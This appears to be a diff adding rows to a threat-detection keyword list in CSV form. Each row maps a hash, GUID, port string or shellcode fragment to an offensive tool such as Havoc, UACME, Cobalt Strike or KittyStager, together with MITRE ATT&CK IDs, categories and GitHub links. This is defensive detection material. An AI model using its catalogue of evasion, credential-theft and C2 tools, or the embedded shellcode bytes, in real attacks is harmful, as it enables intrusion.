+"*40056/service-endpoint*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*-443.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*449CE476-7B27-47F5-B09C-570788A2F261*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*45D748AC-9B16-426E-808D-94662B0417F7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4C3B106C-8782-4374-9459-851749072123*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*4C574B86-DC07-47EA-BB02-FD50AE002910*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*4cec28b4c00002245dffc8346be0cc11*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*4d5350c8-7f8c-47cf-8cde-c752018af17e*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*4DE43724-3851-4376-BB6C-EA15CF500C44*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*4g3nt47/Striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*50050/SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*5067F916-9971-47D6-BBCB-85FB3982584F*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*516280565958*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*516280565959*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5439CECD-3BB3-4807-B33F-E4C299B71CA2*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*555AD0AC-1FDB-4016-8257-170A74CB2F55*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","0","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*57A893C7-7527-4B55-B4E9-D644BBDA89D1*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5A403F3C-9136-4B67-A94E-02D3BCD3162D*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" +"*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" 